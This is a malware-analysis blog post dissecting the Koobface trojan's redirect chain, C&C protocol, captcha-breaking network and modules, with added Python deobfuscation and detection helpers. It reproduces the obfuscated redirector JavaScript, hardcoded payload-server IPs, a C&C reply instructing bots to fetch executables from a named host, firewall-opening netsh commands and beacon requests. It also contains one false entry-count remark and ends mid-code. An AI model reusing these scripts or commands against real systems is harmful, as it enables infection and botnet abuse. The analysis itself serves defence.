
Koobface – the social network trojan

Over the last few days I took a look at a trojan called “Koobface”. The trojan isn’t new, so I’m pretty sure many of you have already heard about it, but I only started studying the Koobface threat this week. First, some general words about Koobface for those who don’t know it yet:

The trojan targets users of social networks such as Facebook and MySpace; its name is an anagram of “Facebook”. After a successful infection the trojan downloads additional modules from the internet, for example a module for captcha breaking and a module that creates Blogspot accounts.

Let’s start with the way Koobface spreads itself, which is quite interesting.

*** Koobface Infection vector ***
I’ve made a small chart which describes how Koobface spreads:

Figure: Koobface infection vector

As the chart shows, Koobface uses a multi-stage redirection chain to hide where its victims actually get infected. First, computers that are already infected with Koobface (bots) publish comments/posts on social networks like Facebook and Twitter (Stage 1) which point to malicious Blogspot or bit.ly URLs (Stage 2). These Blogspot/bit.ly URLs were registered earlier by the bots with the help of a captcha breaking module (more on this later). The Stage 2 URLs redirect the victim to a hijacked website in the third stage. But that is not the end of the story: the hijacked websites host pages containing JavaScript, and that JavaScript redirects the victim once more, to the fourth stage, which finally serves the trojan.

Here are some stats about the number of URLs used in this attack:

Number of fake Blogspot/bit.ly URLs in Stage 2: 34,332*
Number of hijacked websites in Stage 3: 509

* number still growing

The full list of fake Blogspot/bit.ly URLs can be viewed on the following page (both lists are updated in real time):

The list of hijacked websites won’t be published, but I can publish a statistical breakdown of the geographic location of the hijacked websites used by Koobface:

Figure: Koobface hijacked websites geo location

Let’s take a deeper look at what happens in stages 2 to 4.
The Blogspot pages in the second stage contain JavaScript code at the top of the page which redirects to a page in the third stage (the exact code varies):

<script>c6833='do';dc0d1bd="cqfiuqbemnit".replace(/[qfibent]+/g,"");ed9e='ent.r';
f1987="esafvnsaearvub".replace(/[savnub]+/g,"");ge2='rer';
ac8=eval(c6833+dc0d1bd+ed9e+f1987+ge2);b3c1='';h0cf16c3='mspli';
i7775="npkjdstd.dpcrloffrhm".replace(/[pjdtrlfh]+/g,"");j26='mys';
kb96="pdjaglfcfehrn.lfhcbomdk".replace(/[djglfhrnbk]+/g,"");l92='lnk';
m4ab1fa22=".vmblsdxw".replace(/[vbldxw]+/g,"");o5da6f7e8=ac8.indexOf(h0cf16c3+i7775);
p7e259a=ac8.indexOf(j26+kb96);q89=ac8.indexOf(l92+m4ab1fa22);
if(o5da6f7e8+p7e259a+q89!=-3)b3c1='&ms';
ncd1b57="hlbftqkmtmjpl:biff/gm/gbnmlbaqciinqbeklq.gfmnbmgag.qgoccchilobjbsit.gbldjfcleck/c2m9jb2q/m".replace(/[lbfqkmjigc]+/g,"");
location=ncd1b57+"?biugbxosmt".replace(/[biuxsmt]+/g,"")+b3c1;</script>
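The script above can be decoded mechanically, because every obfuscated string is either a plain literal or a literal run through replace(/[…]+/g,"") with a character class that deletes the junk characters. The following Python is an added example (it is not part of the original post and not Koobface code): it emulates that replace call, resolves the concatenations and reports what the script hands to eval(), which referrer substrings it tests with indexOf() and where it sends the browser. The embedded copy of the script is the one quoted above with the wrapped string literal re-joined; the function names are mine.

```python
import re

# The stage-2 redirector quoted above, with the string literal that the page
# wrapped over two lines re-joined; apart from that it is verbatim.
STAGE2_SCRIPT = """c6833='do';dc0d1bd="cqfiuqbemnit".replace(/[qfibent]+/g,"");ed9e='ent.r';
f1987="esafvnsaearvub".replace(/[savnub]+/g,"");ge2='rer';
ac8=eval(c6833+dc0d1bd+ed9e+f1987+ge2);b3c1='';h0cf16c3='mspli';
i7775="npkjdstd.dpcrloffrhm".replace(/[pjdtrlfh]+/g,"");j26='mys';
kb96="pdjaglfcfehrn.lfhcbomdk".replace(/[djglfhrnbk]+/g,"");l92='lnk';
m4ab1fa22=".vmblsdxw".replace(/[vbldxw]+/g,"");o5da6f7e8=ac8.indexOf(h0cf16c3+i7775);
p7e259a=ac8.indexOf(j26+kb96);q89=ac8.indexOf(l92+m4ab1fa22);
if(o5da6f7e8+p7e259a+q89!=-3)b3c1='&ms';
ncd1b57="hlbftqkmtmjpl:biff/gm/gbnmlbaqciinqbeklq.gfmnbmgag.qgoccchilobjbsit.gbldjfcleck/c2m9jb2q/m".replace(/[lbfqkmjigc]+/g,"");
location=ncd1b57+"?biugbxosmt".replace(/[biuxsmt]+/g,"")+b3c1;"""

# "junk".replace(/[set]+/g,"")  -> every character of the class is deleted
STRIP_CALL = re.compile(r'"([^"]*)"\.replace\(/\[([^\]]+)\]\+/g,""\)')
# name='literal'  (after decoding, every string in the script is a plain literal)
ASSIGN = re.compile(r"(\w+)='([^']*)'")


def strip_chars(literal, charset):
    """Emulate JS `literal.replace(/[charset]+/g, "")`."""
    return "".join(ch for ch in literal if ch not in charset)


def decode_stripped_literals(script):
    """Replace each .replace(/[...]+/g,"") call by the plain literal it yields."""
    return STRIP_CALL.sub(lambda m: "'" + strip_chars(m.group(1), m.group(2)) + "'", script)


def first_assignments(decoded):
    """name -> first literal assigned to it. b3c1 starts as '' and is only
    overwritten inside the if(...); that branch is handled in analyse_stage2."""
    env = {}
    for name, value in ASSIGN.findall(decoded):
        env.setdefault(name, value)
    return env


def resolve(expr, env):
    """Evaluate a JS `a+b+'lit'` concatenation against the literal environment."""
    out = []
    for tok in (t.strip() for t in expr.split("+")):
        out.append(tok[1:-1] if tok.startswith("'") else env[tok])
    return "".join(out)


def analyse_stage2(script):
    decoded = decode_stripped_literals(script)
    env = first_assignments(decoded)
    probed = resolve(re.search(r"eval\(([^)]*)\)", decoded).group(1), env)
    checks = [resolve(e, env) for e in re.findall(r"\.indexOf\(([^)]*)\)", decoded)]
    loc_expr = re.search(r"location=(.+?);", decoded).group(1)
    flag_name, flag_value = re.search(r"if\([^)]*\)(\w+)='([^']*)';", decoded).groups()
    return {
        "probed": probed,                    # what eval() resolves to
        "referrer_checks": checks,           # substrings tested with indexOf()
        "redirect": resolve(loc_expr, env),  # target when no check matches
        "redirect_flagged": resolve(loc_expr, {**env, flag_name: flag_value}),
    }


if __name__ == "__main__":
    for key, value in analyse_stage2(STAGE2_SCRIPT).items():
        print(f"{key}: {value}")
```

Running it shows that eval() builds document.referrer, that the three indexOf() checks look for msplinks.com, myspace.com and lnk.ms in the referrer, and that a matching referrer only appends &ms to the redirect, a flag that presumably tells the next stage the visitor came via MySpace rather than Facebook. The same two helpers work on any other sample of this family as long as the obfuscation stays with character-class stripping.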

The bit.ly URLs in the second stage don’t need any additional code: they redirect the victim directly to a hijacked website in the third stage.

As mentioned before, the hijacked websites in the third stage host JavaScript code which redirects the victim to the last stage, which finally serves the trojan. The IPs of the fourth-stage web servers are hardcoded in the third-stage JavaScript (the list of IPs varies):

var ipxgzet0 = [
'24.3' + '0.126.138',
'98.' + '206.3.117',
'90.' + '233.128.87',
'1' + '90.49.190.60',
'217.1' + '32.165.11',
'67' + '.173.62.160',
'6' + '6.57.229.246',
'17' + '4.103.205.78',
'84.1' + '09.34.247',
'79.176.' + '126.109',
'8' + '2.44.232.81',
'17' + '3.21.165.56',
'67.250' + '.29.114',
'99.15' + '5.75.173',
'1' + '73.29.194.142',
'7' + '1.236.10.136',
'94.171' + '.96.107',
'1' + '30.208.150.33',
'70.244.' + '114.178',
'99.1' + '2.240.214',
];
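As an added example (mine, not code from the post or from Koobface), the following Python extracts the fourth-stage addresses from that array: it joins the split literals of each element and validates every candidate with the standard library’s ipaddress module, so a broken join cannot silently turn into a bogus indicator. The embedded array is a copy of the snippet above; the function names are mine.

```python
import ipaddress
import re

# The stage-3 array quoted above (constructed copy of the page's snippet).
STAGE3_SNIPPET = """var ipxgzet0 = [
'24.3' + '0.126.138',
'98.' + '206.3.117',
'90.' + '233.128.87',
'1' + '90.49.190.60',
'217.1' + '32.165.11',
'67' + '.173.62.160',
'6' + '6.57.229.246',
'17' + '4.103.205.78',
'84.1' + '09.34.247',
'79.176.' + '126.109',
'8' + '2.44.232.81',
'17' + '3.21.165.56',
'67.250' + '.29.114',
'99.15' + '5.75.173',
'1' + '73.29.194.142',
'7' + '1.236.10.136',
'94.171' + '.96.107',
'1' + '30.208.150.33',
'70.244.' + '114.178',
'99.1' + '2.240.214',
];"""

FRAGMENT = re.compile(r"'([^']*)'")


def extract_stage4_ips(snippet):
    """Join the split string literals of each array element and keep only
    those that form a syntactically valid IPv4 address."""
    body = snippet[snippet.index("[") + 1:snippet.rindex("]")]
    ips = []
    for element in body.split(","):
        fragments = FRAGMENT.findall(element)
        if not fragments:          # the trailing comma leaves an empty element
            continue
        candidate = "".join(fragments)
        try:
            ips.append(str(ipaddress.IPv4Address(candidate)))
        except ipaddress.AddressValueError:
            raise ValueError(f"element does not join to an IPv4 address: {candidate!r}")
    return ips


def as_blocklist(ips):
    """One /32 per line, the form most gateway blocklists accept."""
    return "\n".join(f"{ip}/32" for ip in ips)


if __name__ == "__main__":
    print(as_blocklist(extract_stage4_ips(STAGE3_SNIPPET)))
```

The array holds 20 entries, one more than the hand-decoded list that follows, which is exactly the kind of slip an automated extraction avoids.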

As you can see, the IPs are obfuscated: each address is split into two string literals which are concatenated at runtime. Joining the fragments of the list above gives these 20 IPs:

24.30.126.138
98.206.3.117
90.233.128.87
190.49.190.60
217.132.165.11
67.173.62.160
66.57.229.246
174.103.205.78
84.109.34.247
79.176.126.109
82.44.232.81
173.21.165.56
67.250.29.114
99.155.75.173
173.29.194.142
71.236.10.136
94.171.96.107
130.208.150.33
70.244.114.178
99.12.240.214

Finally the victim is redirected to one of the IPs above, which serves a file called “setup.exe” containing the Koobface trojan:

Figure: Koobface stage 4

*** The Koobface Trojan ***
If the victim runs the binary (setup.exe), the trojan infects the computer by creating the following file in the Windows directory:

C:\WINDOWS\ld15.exe (VT: 15/41 (36.59%))

Afterwards the trojan tests the victim’s internet connection by sending an HTTP GET request to www.google.com:

GET / HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )
Content-type: application/x-www-form-urlencoded
Connection: close

If google.com answers, the trojan contacts one of the 509 hijacked websites that were already used in the third stage:

POST /.sys/?action=ldgen&v=15 HTTP/1.1
Host: xxxxxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 0

But it’s not that simple: the hijacked websites are only used as redirectors/proxies which forward the request from the infected client to the real command and control (C&C) server:

Figure: Koobface command and control server infrastructure

The traffic between the infected computer and the zombie/proxy is unencrypted, and the answer of the C&C server starts with the string “#BLACKLABEL”. This makes Koobface C&C traffic very easy to detect. The answer of the C&C server can look like this:

#BLACKLABEL
#GEO=FR
#IP=93.221.17.34
#PID=1000
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=go.exe
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=fb.75.exe
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=be.18.exe
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=ms.25.exe
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=hi.15.exe
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=tg.14.exe
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=tw.07.exe
START|http://savecedarcreekpark.com/.sys/?getexe=v2captcha.exe
START|http://savecedarcreekpark.com/.sys/?getexe=v2googlecheck.exe
#CACHE
MD5|ae404c09c11c31900dd72440802b89d9

#SAVED 2009-12-04 06:04:45
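To make the format concrete, here is an added Python parser for this reply (my own example, not code from the post or from Koobface). Besides the header fields and the START/STARTONCE commands it pulls the module file names out of the getexe parameter, and it includes the one-line banner check that makes this traffic easy to spot on the wire. The sample reply is an abridged copy of the one above; the field and function names are mine.

```python
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Constructed from the C&C reply quoted above (abridged to three commands).
SAMPLE_REPLY = """#BLACKLABEL
#GEO=FR
#IP=93.221.17.34
#PID=1000
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=go.exe
STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=fb.75.exe
START|http://savecedarcreekpark.com/.sys/?getexe=v2captcha.exe
#CACHE
MD5|ae404c09c11c31900dd72440802b89d9

#SAVED 2009-12-04 06:04:45
"""


@dataclass
class BlackLabelReply:
    fields: dict = field(default_factory=dict)    # #GEO, #IP, #PID ...
    commands: list = field(default_factory=list)  # (verb, url) before #CACHE
    cache: list = field(default_factory=list)     # (kind, value) after #CACHE
    saved: str = ""                               # timestamp from #SAVED


def looks_like_koobface_cc(body):
    """Network-detection check: the plaintext reply opens with the banner."""
    return body.lstrip().startswith(b"#BLACKLABEL")


def parse_blacklabel(body):
    lines = body.splitlines()
    if not lines or lines[0].strip() != "#BLACKLABEL":
        raise ValueError("not a #BLACKLABEL reply")
    reply, in_cache = BlackLabelReply(), False
    for line in (l.strip() for l in lines[1:]):
        if not line:
            continue
        if line == "#CACHE":
            in_cache = True
        elif line.startswith("#SAVED"):
            reply.saved = line[len("#SAVED"):].strip()
        elif line.startswith("#") and "=" in line:
            key, _, value = line[1:].partition("=")
            reply.fields[key] = value
        elif "|" in line:
            verb, _, value = line.partition("|")
            (reply.cache if in_cache else reply.commands).append((verb, value))
        else:
            raise ValueError(f"unexpected line: {line!r}")
    return reply


def dropped_modules(reply):
    """File names the bot is told to fetch via the ?getexe= parameter."""
    names = []
    for _verb, url in reply.commands:
        names.extend(parse_qs(urlsplit(url).query).get("getexe", []))
    return names


if __name__ == "__main__":
    r = parse_blacklabel(SAMPLE_REPLY)
    print(r.fields, dropped_modules(r), r.saved)
```

The parser is strict on purpose: a line it does not recognise raises instead of being skipped, so a change in the protocol shows up as an error in the sinkhole or sandbox logs rather than as silently missing commands.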

In this example the C&C server simply ordered the infected bot to download more executables. These executables (a kind of “module”) are downloaded and installed by Koobface. Within 36 hours I found 13 unique MD5 hashes (= files) dropped to the infected clients (bots):

v2webserver.exe ce6c3d55759c4ed19ec513313479d2b5 (VT 26/41 (63.41%))
v2prx.exe ea9173cc0a85b804e6d7b764deeb0bbf (VT 37/41 (90.24%))
v2newblogger.exe 69eff369706bb3e4a077c092e2d7dc3e (VT 36/41 (87.80%))
v2googlecheck.exe cf9729bf3969df702767f3b9a131ec2c (VT 39/40 (97.50%))
v2captcha.exe f2d0dbf1b11c5c2ff7e5f4c655d5e43e (VT 39/41 (95.12%))
pp.12.exe 9bc9652e2e1c633bcbdcf9594956d74c (VT 25/41 (60.98%))
go.exe 02dfb635168279394c28ef334b8578b2 (VT 19/41 (46.34%))
fb.75.exe b50a54b54e64f87ac1dc5d3efff0662f (VT 29/41 (70.73%))
tw.07.exe f8b7a8489cc3af7009486d0b1a3a8327 (VT 36/41 (87.80%))
tg.14.exe df8e227f797340574a708e91064c2161 (VT 27/41 (65.85%))
hi.15.exe e94bb0d13a3e0089bf1b3726be5818c9 (VT 37/41 (90.24%))
ms.25.exe 040ffef821932d55cea2c81b8f085274 (VT 8/40 (20.00%))
be.18.exe 26d50e9034d5983ae941601207bb50eb (VT 30/40 (75.00%))

Most of the binaries have a good AV detection rate; the exception is ms.25.exe, which only 8 of 40 engines detected.
Some additional notes: the parameter “getexe” downloads a binary from the C&C server to the client. For example, if you send “getexe=v2googlecheck.exe” to the zombie/proxy, the C&C server checks whether a file called “v2googlecheck.exe” exists in its file repository. If the file does not exist, the C&C server returns an empty file.

In the second request the infected computer sends information about the installed modules to the zombie/proxy (remember: the first request only contained the parameters “action” and “v”):

GET /.sys/?action=ldgen&ff=1&a=-256673417&v=15&l=1000&c_fb=0&c_ms=0&c_hi=0&c_tw=0&c_be=0&c_tg=0&c_nl=0&iedef=0 HTTP/1.1
Host: xxxxxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )
Content-type: application/x-www-form-urlencoded
Connection: close

*** Koobface captcha breaking infrastructure ***

Before we look at the modules/plugins which the Koobface trojan drops, let’s take a look at the captcha breaking infrastructure used by Koobface. Koobface uses two backend servers to control the captcha breaking process:

  • capthcabreak.com (67.212.69.230 – Netelligent Hosting Services Inc. Canada)
  • captchastop.com (67.212.69.230 – Netelligent Hosting Services Inc. Canada)

The modules involved in the captcha breaking process (v2newblogger.exe and v2captcha.exe) use these servers. I’ve created a small chart which shows Koobface’s captcha breaking infrastructure:

Figure: Koobface captcha breaking infrastructure

Some words about the way Koobface breaks captchas:

  • The way Koobface breaks captchas is very sophisticated
  • The time between grabbing a captcha and breaking it is less than three minutes (most of the time just a few seconds!)
  • Due to the way Koobface’s infrastructure works, it is possible to break hundreds of captchas per minute!
  • In this way it is possible to register thousands of fake bit.ly/Blogspot accounts per day

Additionally, there is an interesting thing on the start page of the two domains used for captcha breaking. The sites advertise a “Captcha Decoder Servis” including a contact e-mail address, which looks like a commercial captcha breaking service. The Koobface botnet obviously supplies enormous resources for breaking captchas, like a ‘human’ grid computing network, so it would make sense to make part of it commercially available to third parties.

*** Koobface modules / plugins ***
Last but not least, let’s take a look at a couple of the Koobface modules dropped by the command and control server (C&C). Note that the cybercriminals can drop new files (modules) at any time.

v2prx.exe – A dnsfilter / dnsblocker module
Before we look at the way this module works, let’s look at an interesting relic left behind by the author of this binary. If you look at the strings in v2prx.exe you will find the following lines:

x:\work\softv2\dnsblocker\driver\devctrl.c
c:\WINDDK\inc\ddk\wdm.h
x:\work\softv2\dnsblocker\driver\devtcp.c
x:\work\softv2\dnsblocker\driver\devudp.c
x:\work\softv2\dnsblocker\driver\addr.c
x:\work\softv2\dnsblocker\driver\tcpconn.c
x:\work\softv2\dnsblocker\driver\tcprecv.c
x:\work\softv2\dnsblocker\driver\tcpsend.c
x:\work\softv2\dnsblocker\driver\udprecv.c
x:\work\softv2\dnsblocker\driver\udpsend.c
x:\work\softv2\dnsblocker\driver\packet.c
x:\work\softv2\dnsblocker\driver\ctrlio.c
x:\work\softv2\dnsblocker\driver\objchk_wxp_x86\i386\FIO32.pdb

These are relics of the author’s build environment: source and PDB paths which the compiler and linker embedded in the binary. You can also see that he used Microsoft’s Windows Driver Kit (WDK).

The module creates two SYS files in the system32 directory:

C:\WINDOWS\system32\drivers\fio32.sys
C:\WINDOWS\system32\fio32.sys

Afterwards it connects to a command and control server at ze-biz.com (85.13.236.154 – COREIX-UK-AS Coreix Limited, London):

GeT /v50/?v=97&s=I&uid=-256673417&p=1000&q= HttP/1.0
HoST: 85.13.236.154
UsER-AgENt:

Notice the unusual capitalisation of the request line and the header names: the HTTP method and version are case-sensitive, so “GeT” and “HttP/1.0” are not what a normal HTTP client sends, which makes this traffic easy to pick out. The C&C server tells the module which domains it should filter/block and which HTTP requests it has to redirect to the C&C server.

v2webserver.exe – A simple webserver used to spread Koobface
This module turns the victim’s computer into a web server. Interestingly, this binary isn’t dropped to every bot. For comparison: the captcha breaking module (v2captcha.exe) was dropped to my test script 419 times, while I saw v2webserver.exe only 197 times. Conclusion: not every bot is turned into a “zombie” (which is what Stage 4 of Koobface’s infection process uses).

The module installs itself in the Program Files directory…

C:\Program Files\webserver\webserver.exe

File: webserver.exe
File size: 13312 bytes
MD5 : ce6c3d55759c4ed19ec513313479d2b5
VT: 26/41 (63.41%)

…and tries to open port 80 (HTTP) and port 53 (DNS) in the Windows Firewall using the following commands:

netsh firewall add portopening TCP 53 webserver.exe ENABLE
netsh firewall add portopening TCP 80 webserver.exe ENABLE
netsh add allowedprogram "procname.exe" webserver.exe ENABLE

Afterwards the module tries to resolve aol.com and www.imageshack.com. If the lookup succeeds, it pings the IP addresses of aol.com (207.200.74.38) and www.imageshack.com (64.202.189.170), measures the response time of the ping packets sent to aol and imageshack and reports it to the Koobface C&C server:

POST /webserver/?uptime=3&v=0&sub=60&ping=114&proxy=0&hits=0 HTTP/1.0
Host: uuu20091124.info
Content-Type: binary/octet-stream
Content-Length: 0

The module also reports the client’s uptime and how many hits the web server has had. If you now connect to port 80 on the client you will see the following code:

Page moved <a href="#" onclick="javascript:location.reload();return false;">here</a>.
<script>setTimeout('location.reload()', 1000)</script>

Et voilà: the computer can now be used as a zombie/proxy in Koobface’s C&C infrastructure and as a server in the fourth stage of Koobface’s infection process.
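The beacons quoted so far share a few things a proxy log or IDS can key on: the /.sys/?action=ldgen and ?getexe= paths, the loader’s User-Agent with the odd “na” token, the mixed-case request line of v2prx.exe and the /webserver/?uptime= report above; the module sections below add the /captcha/, /check/ and /blogspot/ endpoints on capthcabreak.com. The following Python is an added detection example (mine, not from the post) that parses a raw request and names every indicator it matches. The sample requests are constructed from the captures in this post, the indicator names are my own, and each URL pattern reflects only the requests shown on this page.

```python
import re

# Raw requests constructed from the captures in this post (bodies omitted).
SAMPLES = {
    "ldgen": ("POST /.sys/?action=ldgen&v=15 HTTP/1.1\n"
              "Host: xxxxxx.com\n"
              "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )\n"
              "Content-Length: 0\n\n"),
    "v2prx": ("GeT /v50/?v=97&s=I&uid=-256673417&p=1000&q= HttP/1.0\n"
              "HoST: 85.13.236.154\n"
              "UsER-AgENt:\n\n"),
    "webserver": ("POST /webserver/?uptime=3&v=0&sub=60&ping=114&proxy=0&hits=0 HTTP/1.0\n"
                  "Host: uuu20091124.info\n"
                  "Content-Type: binary/octet-stream\n\n"),
    "benign": ("GET /news?ned=us&output=rss HTTP/1.1\n"
               "Host: news.google.com\n"
               "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\n\n"),
}

# URL patterns from the beacons documented in this post; the indicator names are mine.
URL_INDICATORS = [
    ("koobface.ldgen_beacon", re.compile(r"^/\.sys/\?action=ldgen\b")),
    ("koobface.getexe_download", re.compile(r"^/\.sys/\?getexe=")),
    ("koobface.v2prx_checkin", re.compile(r"^/v50/\?v=\d+&s=\w+&uid=-?\d+")),
    ("koobface.v2webserver_report", re.compile(r"^/webserver/\?uptime=")),
    ("koobface.captcha_broker", re.compile(r"^/captcha/\?a=(get|put|save|query)\b")),
    ("koobface.urlcheck", re.compile(r"^/check/(in|blocked|out)\.php\?v=")),
    ("koobface.newblogger", re.compile(r"^/blogspot/newblogger\.php\?")),
]
LOADER_UA = "Mozilla/4.0 (compatible; MSIE 7.0; na; )"
REQUEST_LINE = re.compile(r"^(\S+) (\S+) (HTTP/\d\.\d)$", re.IGNORECASE)


def parse_request(raw):
    """Split a raw HTTP request into (method, target, version, headers)."""
    head = raw.partition("\n\n")[0]
    lines = head.splitlines()
    m = REQUEST_LINE.match(lines[0].strip())
    if not m:
        raise ValueError(f"not an HTTP request line: {lines[0]!r}")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return (*m.groups(), headers)


def koobface_indicators(raw):
    """Return the names of every indicator the request matches ([] = nothing seen)."""
    method, target, version, headers = parse_request(raw)
    hits = []
    # Method and version tokens are case-sensitive in HTTP; a real client sends
    # "GET ... HTTP/1.0", so "GeT ... HttP/1.0" betrays a hand-rolled client.
    if method != method.upper() or version != version.upper():
        hits.append("http.mixed_case_request_line")
    if headers.get("user-agent") == LOADER_UA:
        hits.append("koobface.loader_user_agent")
    hits.extend(name for name, pattern in URL_INDICATORS if pattern.search(target))
    return hits


if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(f"{label:10s} {koobface_indicators(raw)}")
```

The URL patterns are the brittle part (the gang can rename a script in the next module drop); the request-line and User-Agent checks describe the client implementation rather than a path and tend to survive such changes.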

v2newblogger.exe – A module to create new Blogspot URLs (Google)
The module v2newblogger.exe tries to create new Blogspot URLs. Let’s see how this works.

Initially the module connects to news.google.com and requests the “Top Stories” RSS feed:

GET /news?ned=us&output=rss HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: news.google.com
Connection: Keep-Alive

It later uses the title and content of the top story to create a post on Blogspot. In the next step the module calls the C&C server capthcabreak.com (67.212.69.230 – Netelligent Hosting Services Inc., Canada) and requests a username which it will use for blogspot.com:

GET /blogspot/newblogger.php?a=names&ver=12 HTTP/1.0
Host: capthcabreak.com
User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.2; ru; rv:1.9.0.1) Gecko/20050104 Firefox/3.0.2
Connection: close

The C&C server responds with a random first name, last name and username:

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix)
Connection: close
Content-Type: text/html

Ursdilla
Knous
KnousUrsdilla

In the next step the module calls mail.google.com/mail/signup to create a new Google account. The web form is protected by a captcha, but that is no problem for Koobface: it grabs the captcha image and sends it to the C&C server:

POST /captcha/?a=save&b=goo HTTP/1.0
Host: capthcabreak.com
User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.2; ru; rv:1.9.0.1) Gecko/20050104 Firefox/3.0.2
Content-Type: binary/octet-stream
Connection: close
Content-Length: 2694

The C&C server returns a task ID for this captcha:

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Connection: close
Content-Type: text/html

15611345

A few seconds later the module calls the C&C server again and asks for the status of the task ID:

GET /captcha/?a=query&b=goo&id=15611345 HTTP/1.0
Host: capthcabreak.com
User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.2; ru; rv:1.9.0.1) Gecko/20050104 Firefox/3.0.2
Connection: close

and the C&C server responds with the status of the task (and, if available, the solution of the captcha):

HTTP/1.1 200 OK
Date: Sat, 05 Dec 2009 10:30:34 GMT
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Connection: close
Content-Type: text/html

3|dreamyter

The C&C server returns a status code (3) followed by the captcha solution (dreamyter). Now the module can create the account without any problems.

v2googlecheck.exe – A module to check Facebook for blocked URLs
This module is REALLY interesting: it is used to check whether a Blogspot or bit.ly URL is blocked at Facebook. Some background information: if you see a URL on Facebook and think it is malicious, you can report it to Facebook. Facebook then checks whether the URL is malicious and, if so, blocks it:

Figure: Facebook blocks Koobface URLs

To react to this “problem”, the Koobface gang drops the binary “v2googlecheck.exe”.
First of all the module reports its version to the Koobface C&C (capthcabreak.com):

GET /check/in.php?v=7 HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: capthcabreak.com
Connection: Keep-Alive

The C&C server answers with a Blogspot or bit.ly URL:

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

28

http://kaileywali.blogspot.com/

191720

0

The C&C server answers with a Blogspot or bit.ly URL and a task ID (191720).
Now the module checks whether the URL is blocked on Facebook by calling a script called l.php on facebook.com:

GET /l.php?u=http%3A%2F%2Fkaileywali.blogspot.com%2F HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Connection: Keep-Alive

If the Blogspot URL is blocked by Facebook, Facebook returns an error page (as seen above); otherwise the request is redirected to the Blogspot URL. Either way, the module saves the response body from Facebook and sends it back to the C&C server:

POST /check/blocked.php?v=7&url=http%3A%2F%2Fkaileywali.blogspot.com%2F HTTP/1.1
Accept: */*
Content-Type: binary/octet-stream
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: capthcabreak.com
Content-Length: 13551
Connection: Keep-Alive
Cache-Control: no-cache

A few seconds later the module checks the status of its previous submission by calling the C&C server with the task ID it received before (191720):

POST /check/out.php?v=7 HTTP/1.1
Accept: */*
Content-Type: binary/octet-stream
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: capthcabreak.com
Content-Length: 9
Connection: Keep-Alive
Cache-Control: no-cache

191720

The C&C answers with 0, which closes/finishes the task.

v2captcha.exe – The captcha breaking module
This module frequently polls the C&C server for new captchas to break. The request which the module sends to the C&C server looks like this:

GET /captcha/?a=get&i=0&v=14 HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: capthcabreak.com
Connection: Keep-Alive

The C&C server checks whether it has a captcha to break. If not, it simply returns 0; otherwise it returns a task ID and a captcha which the bot has to break:

HTTP/1.1 200 OK
Date: Sat, 05 Dec 2009 11:37:51 GMT
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

95
11623014|http://captcha.com/captcha/tmp/11623014.jpg|Enter both words below, separated by a space.|([a-zA-Z0-9\$\.\,\/]+)([ ]+)([a-zA-Z0-9\$\.\,\/]+)
0

The module requests the captcha image from the server (captcha.com) and freezes the computer screen with the message “Type the characters you see in the picture below”. To unlock the screen, the user must enter the captcha served by Koobface:

Figure: Koobface captcha breaking module

Of course Koobface doesn’t know the solution of the captcha, so you can submit a wrong result; Koobface at least checks the length of your submission (the task it received contains a regular expression describing the expected format). If the user enters a result for the captcha, the module sends it back to the C&C server together with the task ID received from the C&C server before:

GET /captcha/?a=put&id=191720&v=14&code=misterwis%20schole HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: capthcabreak.com
Connection: Keep-Alive
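Putting the two halves together, the captcha exchange between v2newblogger.exe (which submits an image with a=save and polls with a=query) and v2captcha.exe (which fetches work with a=get and returns the typed text with a=put) can be modelled as one small broker. The following Python is an added example, my own model and not code from the post or from Koobface: the reply formats, the status code 3 and the prompt and regex from the a=get reply are taken from the captures above, while the task-id seed, the kind argument standing in for the b=goo parameter, the queue/pending bookkeeping and the use of the advertised regex to reject malformed answers are assumptions.

```python
import re
from itertools import count

# Prompt and answer pattern exactly as they appear in the a=get reply above.
PROMPT = "Enter both words below, separated by a space."
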